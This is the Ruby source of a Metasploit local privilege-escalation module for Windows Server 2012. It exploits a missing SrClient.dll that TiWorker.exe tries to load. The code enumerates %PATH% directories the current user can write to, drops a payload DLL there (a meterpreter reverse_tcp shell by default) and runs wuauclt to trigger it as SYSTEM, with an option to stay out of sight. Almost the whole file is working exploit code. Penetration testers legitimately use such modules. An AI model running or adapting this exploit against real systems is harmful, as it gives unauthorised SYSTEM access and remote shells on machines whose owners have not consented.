adfoster-r7
373 lines
14 KiB
Ruby
373 lines
14 KiB
Ruby
class MetasploitModule < Msf::Exploit::Local
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::EXE
|
|
include Msf::Exploit::FileDropper
|
|
include Msf::Post::Common
|
|
include Msf::Post::File
|
|
include Msf::Post::Windows::Priv
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Windows Server 2012 SrClient DLL hijacking',
|
|
'Description' => %q{
|
|
All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL
|
|
hijacking due to the way TiWorker.exe will try to call the non-existent
|
|
`SrClient.dll` file when Windows Update checks for updates. This issue can be
|
|
leveraged for privilege escalation if %PATH% includes directories that are
|
|
writable by low-privileged users. The attack can be triggered by any
|
|
low-privileged user and does not require a system reboot.
|
|
|
|
This module has been successfully tested on Windows Server 2012 (x64).
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'Erik Wynter' # @wyntererik - Discovery & Metasploit
|
|
],
|
|
'Platform' => 'win',
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
'DefaultOptions' => {
|
|
'Wfsdelay' => 60,
|
|
'EXITFUNC' => 'thread'
|
|
},
|
|
'Targets' => [
|
|
[
|
|
'Windows Server 2012 (x64)', {
|
|
'Arch' => [ARCH_X64],
|
|
'DefaultOptions' => {
|
|
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
|
|
}
|
|
}
|
|
]
|
|
],
|
|
'References' => [
|
|
[ 'URL', 'https://blog.vonahi.io/srclient-dll-hijacking' ],
|
|
],
|
|
'DisclosureDate' => '2021-02-19',
|
|
'DefaultTarget' => 0,
|
|
'Notes' => {
|
|
'Stability' => [ CRASH_SERVICE_DOWN ],
|
|
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS ],
|
|
'Reliability' => [ UNRELIABLE_SESSION ]
|
|
},
|
|
'Compat' => {
|
|
'Meterpreter' => {
|
|
'Commands' => %w[
|
|
stdapi_sys_config_getuid
|
|
stdapi_sys_process_get_processes
|
|
]
|
|
}
|
|
}
|
|
)
|
|
)
|
|
|
|
register_options([
|
|
OptString.new('WRITABLE_PATH_DIR', [false, 'Path to a writable %PATH% directory to write the payload to.', '']),
|
|
OptBool.new('STEALTH_ONLY', [false, 'Only exploit if the payload can be triggered without launching the Windows Update UI) ', false]),
|
|
OptInt.new('WAIT_FOR_TIWORKER', [false, 'No. of minutes to wait for TiWorker.exe to finish running if it is already active. ', 0])
|
|
])
|
|
end
|
|
|
|
def provided_path_dir
|
|
datastore['WRITABLE_PATH_DIR']
|
|
end
|
|
|
|
def stealth_only
|
|
datastore['STEALTH_ONLY']
|
|
end
|
|
|
|
def wait_for_tiworker
|
|
datastore['WAIT_FOR_TIWORKER']
|
|
end
|
|
|
|
def force_exploit_message
|
|
" If #{provided_path_dir} should be writable and part of %PATH%, enter `set ForceExploit true` and rerun the module."
|
|
end
|
|
|
|
def grab_user_groups(current_user)
|
|
print_status("Obtaining group information for the current user #{current_user}...")
|
|
|
|
# add current user to the groups we are a member of in case user-specific permissions are set for any of the %PATH% directories
|
|
user_groups = [current_user]
|
|
|
|
whoami_groups = get_whoami
|
|
|
|
unless whoami_groups.blank?
|
|
print_status('')
|
|
whoami_groups.split("\r\n").each do |line|
|
|
exclude_strings = ['----', '====', 'GROUP INFORMATION', 'Group Name', 'Mandatory Label']
|
|
line = line.strip
|
|
next if line.empty?
|
|
next if exclude_strings.any? { |ex_str| line.include?(ex_str) }
|
|
|
|
group = line.split(' ')[0]
|
|
user_groups << group
|
|
print_status("\t#{group}")
|
|
end
|
|
|
|
print_status('')
|
|
end
|
|
user_groups
|
|
end
|
|
|
|
def find_pdir_owner(pdir, current_user)
|
|
# we need double backslashes in the path for wmic, using block gsub because regular gsub doesn't seem to work
|
|
pdir_escaped = pdir.gsub(/\\/) { '\\\\' }
|
|
pdir_owner_info = cmd_exec("wmic path Win32_LogicalFileSecuritySetting where Path=\"#{pdir_escaped}\" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID")
|
|
if pdir_owner_info.blank? || pdir_owner_info.split('{')[0].blank?
|
|
return false
|
|
end
|
|
|
|
pdir_owner_suffix = pdir_owner_info.split('{')[0]
|
|
pdir_owner_prefix = pdir_owner_info.scan(/\}\s+(.*?)S-\d-\d+-(\d+-){1,14}\d/).flatten.first
|
|
|
|
if pdir_owner_prefix.blank? || pdir_owner_suffix.blank?
|
|
return false
|
|
end
|
|
|
|
pdir_owner_name = "#{pdir_owner_prefix.strip}\\#{pdir_owner_suffix.strip}"
|
|
if pdir_owner_name.downcase == current_user.downcase
|
|
return true
|
|
else
|
|
return false
|
|
end
|
|
end
|
|
|
|
def enumerate_writable_path_dirs(path_dirs, user_groups, current_user)
|
|
writable_path_dirs = []
|
|
perms_we_need = ['(F)', '(M)']
|
|
print_status('')
|
|
|
|
path_dirs.split(';').each do |pdir|
|
|
next if pdir.blank? || pdir.strip.blank?
|
|
|
|
# directories can't and with a backslash, otherwise some commands will throw an error
|
|
pdir = pdir.strip.delete_suffix('\\')
|
|
|
|
# if the user has provided a target dir, only look at that one
|
|
if !provided_path_dir.blank? && pdir.downcase != provided_path_dir.downcase
|
|
next
|
|
end
|
|
|
|
print_status("\tChecking permissions for #{pdir}")
|
|
|
|
# check if the current user owns pdir
|
|
user_owns_pdir = find_pdir_owner(pdir, current_user)
|
|
|
|
# use icalcs to get the directory permissions
|
|
permissions = cmd_exec("icacls \"#{pdir}\"")
|
|
next if permissions.blank?
|
|
next if permissions.split(pdir.to_s)[1] && permissions.split(pdir.to_s)[1].length < 2
|
|
|
|
# the output should always start with the provided directory, so we need to remove that
|
|
groups_perms = permissions.split(pdir.to_s)[1].strip
|
|
next if groups_perms.empty?
|
|
|
|
# iterate over the listed permissions for different groups
|
|
groups_perms.split("\n").each do |gp|
|
|
gp = gp.strip
|
|
|
|
# the format should be <group>:<perms>, so gp must always include `:`
|
|
next unless gp.include?(':')
|
|
|
|
# grab the group name and permissions
|
|
group, perms = gp.split(':')
|
|
next if group.blank? || perms.blank?
|
|
|
|
group = group.strip
|
|
perms = perms.strip
|
|
|
|
# if the current user owns the directory, check for the directory permissions as well
|
|
if user_owns_pdir && group == 'CREATOR OWNER' && perms_we_need.any? { |prm| perms.downcase.include? prm.downcase }
|
|
writable_path_dirs << pdir unless writable_path_dirs.include?(pdir)
|
|
next
|
|
end
|
|
|
|
# ignore groups that don't match the groups for the current user, or the required permissions
|
|
next unless user_groups.any? { |ug| group.downcase == ug.downcase }
|
|
next unless perms_we_need.any? { |prm| perms.downcase.include? prm.downcase }
|
|
|
|
# if we are here, we found a %PATH% directory we can write to!!!
|
|
writable_path_dirs << pdir unless writable_path_dirs.include?(pdir)
|
|
end
|
|
end
|
|
|
|
print_status('')
|
|
|
|
writable_path_dirs
|
|
end
|
|
|
|
def exploitation_message(trigger_cmd)
|
|
if trigger_cmd == 'wuauclt /detectnow'
|
|
print_status("Trying to trigger the payload in the background via the shell command `#{trigger_cmd}`")
|
|
else
|
|
print_status("Trying to trigger the payload via the shell command `#{trigger_cmd}`")
|
|
end
|
|
end
|
|
|
|
def monitor_tiworker
|
|
print_warning("TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to #{wait_for_tiworker} minute(s)...")
|
|
wait_time_left = wait_for_tiworker
|
|
sleep_time = 0
|
|
while wait_time_left > 0
|
|
sleep 10
|
|
|
|
host_processes = client.sys.process.get_processes
|
|
if host_processes.none? { |ps| ps['name'] == 'TiWorker.exe' }
|
|
print_status('TiWorker.exe is no longer running on the target. Proceding with exploitation.')
|
|
break
|
|
end
|
|
|
|
sleep_time += 10
|
|
next unless sleep_time == 60
|
|
|
|
wait_time_left -= 1
|
|
sleep_time = 0
|
|
print_status("TiWorker.exe is still running on the target. The module will keep checking for #{wait_time_left} minute(s)...")
|
|
end
|
|
end
|
|
|
|
def check
|
|
version = get_version_info
|
|
unless version.build_number == Msf::WindowsVersion::Server2012 && version.windows_server?
|
|
return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
|
|
end
|
|
|
|
print_status("Target is #{version.product_name}")
|
|
|
|
# obtain the Windows Update setting to see if exploitation could work at all
|
|
@wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')
|
|
|
|
if @wupdate_setting.nil?
|
|
# if this is true, Windows Update has probably never been configured on the target, and the attack most likely won't work.
|
|
return Exploit::CheckCode::Safe('Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.')
|
|
end
|
|
|
|
unless (1..4).include?(@wupdate_setting)
|
|
return Exploit::CheckCode::Unknown('Received unexpected reply when trying to obtain the Windows Update setting.')
|
|
end
|
|
|
|
# get groups for the current user, this is necessary to verify write permissions
|
|
current_user = session.sys.config.getuid
|
|
user_groups = grab_user_groups(current_user)
|
|
|
|
# get %PATH% dirs and check if the current user can write to them
|
|
print_status('Checking for writable directories in %PATH%...')
|
|
# we can't use get_envs('PATH') here because that returns all PATH directories, but we only need those in the SYSTEM PATH
|
|
path_dirs = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment', 'path')
|
|
|
|
if path_dirs.blank?
|
|
get_path_fail_message = 'Failed to obtain %PATH% directories.'
|
|
unless provided_path_dir.blank?
|
|
get_path_fail_message << force_exploit_message
|
|
end
|
|
return Exploit::CheckCode::Unknown(get_path_fail_message)
|
|
end
|
|
|
|
@writable_path_dirs = enumerate_writable_path_dirs(path_dirs, user_groups, current_user)
|
|
|
|
writable_path_dirs_fail_message = "#{current_user} does not seem to have write permissions to any of the %PATH% directories"
|
|
|
|
if @writable_path_dirs.empty?
|
|
unless provided_path_dir.blank?
|
|
writable_path_dirs_fail_message << force_exploit_message
|
|
end
|
|
return Exploit::CheckCode::Safe(writable_path_dirs_fail_message)
|
|
end
|
|
|
|
if provided_path_dir.blank?
|
|
print_good("#{current_user} has write permissions to the following %PATH% directories:")
|
|
print_status('')
|
|
@writable_path_dirs.each { |wpd| print_status("\t#{wpd}") }
|
|
print_status('')
|
|
else
|
|
print_good("#{current_user} has write permissions to #{provided_path_dir}")
|
|
end
|
|
|
|
return Exploit::CheckCode::Appears
|
|
end
|
|
|
|
def exploit
|
|
if is_system?
|
|
fail_with(Failure::None, 'Session is already elevated')
|
|
end
|
|
|
|
payload_arch = payload.arch.first
|
|
if (payload_arch != ARCH_X64)
|
|
fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch}). Only 64-bit (x64) payloads are supported.") # Unsupported architecture, so return an error.
|
|
end
|
|
|
|
# check if TiWorker.exe is already running, in which case exploitation will fail
|
|
host_processes = client.sys.process.get_processes
|
|
if host_processes.any? { |ps| ps['name'] == 'TiWorker.exe' }
|
|
unless wait_for_tiworker > 0
|
|
fail_with(Failure::Unknown, 'TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.')
|
|
end
|
|
|
|
monitor_tiworker
|
|
end
|
|
|
|
# There are three commands we can run to get the target to start checking for Windows updates, which should launch TiWorker.exe and trigger the payload as SYSTEM
|
|
## 'wuauclt /detectnow': This triggers the payload in the background, but won't work when Windows Update is set to never check for updates.
|
|
## 'wuauclt /selfupdatemanaged': This triggers the payload by launching the Windows Update UI, which then scans for updates using the WSUS settings. This is not stealthy, but works with all Windows Update settings.
|
|
## 'wuauclt /selfupdateunmanaged': This triggers the payload by launching the Windows Update UI, which then scans for updates using the Windows Update site. This is not stealthy, but works with all Windows Update settings.
|
|
## the module prefers /selfupdatemanaged over /selfupdateunmanaged when /detectnow is not possible because /selfupdateunmanaged may require the target to be able to reach the Windows Update server
|
|
|
|
case @wupdate_setting
|
|
when 1
|
|
print_warning('Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.')
|
|
if stealth_only
|
|
fail_with(Failure::Unknown, 'Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.')
|
|
return
|
|
end
|
|
trigger_cmd = 'wuauclt /selfupdatemanaged'
|
|
when 2..4
|
|
# trigger the payload in the background if we can
|
|
trigger_cmd = 'wuauclt /detectnow'
|
|
else
|
|
# if this is true, ForceExploit has been set and we should just roll with it
|
|
print_warning('Windows Update is not configured or returned an unexpected value. Exploitation may not work.')
|
|
if stealth_only
|
|
trigger_cmd = 'wuauclt /detectnow'
|
|
else
|
|
# go out guns blazing and hope for the best
|
|
print_status('The module will launch the Windows Update window on the target in an attempt to trigger the payload.')
|
|
trigger_cmd = 'wuauclt /selfupdatemanaged'
|
|
end
|
|
end
|
|
|
|
# select a target directory to write the payload to
|
|
if @writable_path_dirs.empty? # this means ForceExploit is being used
|
|
if provided_path_dir.blank?
|
|
fail_with(Failure::BadConfig, 'Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.')
|
|
end
|
|
|
|
dll_path = provided_path_dir
|
|
else
|
|
dll_path = @writable_path_dirs[0]
|
|
end
|
|
|
|
# generate and write payload
|
|
dll_path << '\\' unless dll_path.end_with?('\\')
|
|
@dll_file_path = "#{dll_path}SrClient.dll"
|
|
dll = generate_payload_dll
|
|
|
|
print_status("Writing #{dll.length} bytes to #{@dll_file_path}...")
|
|
begin
|
|
# write_file(@dll_file_path, dll)
|
|
write_file(@dll_file_path, dll)
|
|
register_file_for_cleanup(@dll_file_path)
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
# Can't write the file, can't go on
|
|
fail_with(Failure::Unknown, e.message)
|
|
end
|
|
|
|
# trigger the payload
|
|
exploitation_message(trigger_cmd)
|
|
cmd_exec(trigger_cmd)
|
|
end
|
|
end
|